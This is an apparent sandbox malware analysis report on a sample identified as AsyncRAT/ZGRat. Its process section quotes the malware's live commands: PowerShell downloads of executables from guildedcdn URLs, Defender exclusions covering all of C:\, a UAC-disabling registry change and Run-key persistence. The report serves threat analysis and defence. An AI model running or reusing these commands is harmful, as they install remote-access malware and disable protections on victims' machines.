Malware Analysis Report

2025-08-10 19:35

Sample ID 231115-mtvrjshb4w
Target resources.exe
SHA256 f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Tags asyncrat zgrat operacert windefault evasion persistence rat trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256

f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

Threat Level: Known bad

The file resources.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat zgrat operacert windefault evasion persistence rat trojan

UAC bypass

Detect ZGRat V1

AsyncRat

ZGRat

Async RAT payload

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Drops startup file

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies registry class

Delays execution with timeout.exe

Modifies registry key

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-15 10:45

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-15 10:45

Reported

2023-11-15 10:48

Platform

win7-20231023-en

Max time kernel

118s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\resources.exe

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 820

Network

N/A

Files

memory/2124-0-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2124-1-0x0000000074530000-0x0000000074C1E000-memory.dmp

memory/2124-3-0x0000000074530000-0x0000000074C1E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-15 10:45

Reported

2023-11-15 10:48

Platform

win10v2004-20231023-en

Max time kernel

147s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunNihaiersion.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunihaiVersion.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil2.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\2WinDefault.exe

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\resources.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A
N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\ChromeCrt.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\svchost.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4448 wrote to memory of 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\cmd.exe
PID 4448 wrote to memory of 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\cmd.exe
PID 4448 wrote to memory of 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 1148 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1148 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1148 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 3160 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 3160 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 3160 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5084 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5084 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5084 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4740 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4740 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4740 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4456 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4456 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4456 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 768 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 768 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 768 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 2980 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 2980 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 2980 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 664 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\Music\RunNihaiersion.exe
PID 4136 wrote to memory of 664 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\Music\RunNihaiersion.exe
PID 4136 wrote to memory of 664 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\Music\RunNihaiersion.exe
PID 4136 wrote to memory of 2580 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 2580 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 2580 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 664 wrote to memory of 2184 | N/A | C:\Users\Public\Music\RunNihaiersion.exe | C:\Windows\SysWOW64\cmd.exe
PID 664 wrote to memory of 2184 | N/A | C:\Users\Public\Music\RunNihaiersion.exe | C:\Windows\SysWOW64\cmd.exe
PID 664 wrote to memory of 2184 | N/A | C:\Users\Public\Music\RunNihaiersion.exe | C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 1640 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 2184 wrote to memory of 1640 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 2184 wrote to memory of 1640 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe
PID 1640 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe
PID 2184 wrote to memory of 4504 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\Music\israil.exe
PID 2184 wrote to memory of 4504 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\Music\israil.exe
PID 2184 wrote to memory of 4504 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\Music\israil.exe
PID 4504 wrote to memory of 820 | N/A | C:\Users\Public\Music\israil.exe | C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 820 | N/A | C:\Users\Public\Music\israil.exe | C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 820 | N/A | C:\Users\Public\Music\israil.exe | C:\Windows\SysWOW64\cmd.exe
PID 820 wrote to memory of 4472 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 4472 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 4472 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 2696 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 2696 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 2696 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 376 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\Music\RunihaiVersion.exe
PID 4136 wrote to memory of 376 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\Music\RunihaiVersion.exe
PID 4136 wrote to memory of 376 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\Music\RunihaiVersion.exe
PID 376 wrote to memory of 3680 | N/A | C:\Users\Public\Music\RunihaiVersion.exe | C:\Windows\SysWOW64\cmd.exe
PID 376 wrote to memory of 3680 | N/A | C:\Users\Public\Music\RunihaiVersion.exe | C:\Windows\SysWOW64\cmd.exe
PID 376 wrote to memory of 3680 | N/A | C:\Users\Public\Music\RunihaiVersion.exe | C:\Windows\SysWOW64\cmd.exe
PID 3680 wrote to memory of 2456 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\00b65495-88ce-45af-bf00-3dc3c78edb4f.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"

C:\Users\Public\Music\RunNihaiersion.exe

RunNihaiersion.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil.exe

"C:\Users\Public\Music\israil.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"

C:\Users\Public\Music\RunihaiVersion.exe

RunihaiVersion.exe

C:\Windows\SysWOW64\cmd.exe

